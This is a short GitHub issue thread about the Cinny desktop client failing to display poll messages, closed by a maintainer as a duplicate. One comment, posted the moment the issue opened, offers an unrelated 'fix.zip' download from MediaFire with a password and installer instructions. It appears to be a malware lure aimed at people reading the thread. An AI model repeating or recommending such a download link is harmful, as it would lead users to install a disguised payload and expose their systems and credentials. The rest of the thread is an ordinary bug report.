### ISSUE TITLE
Cannot see pools

### ISSUE THREAD

**Issue by basketshoe** [ajbura/cinny#1910] opened 2024-08-26 09:14 UTC
### Describe the bug

Messages containing pools are not visible in Cinny desktop (while they appear in Element)

### Platform and versions

```shell
1. OS: Windows 11
2. Cinny version: 4.1.0
3. Matrix homeserver: matrix.org
```

**Comment by qlqw233** [comment] 2024-08-26 09:14
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kfiven** [comment] 2024-08-26 09:32
Duplicate of #563

**Closed as not planned by kfiven** 2024-08-26 09:32 UTC
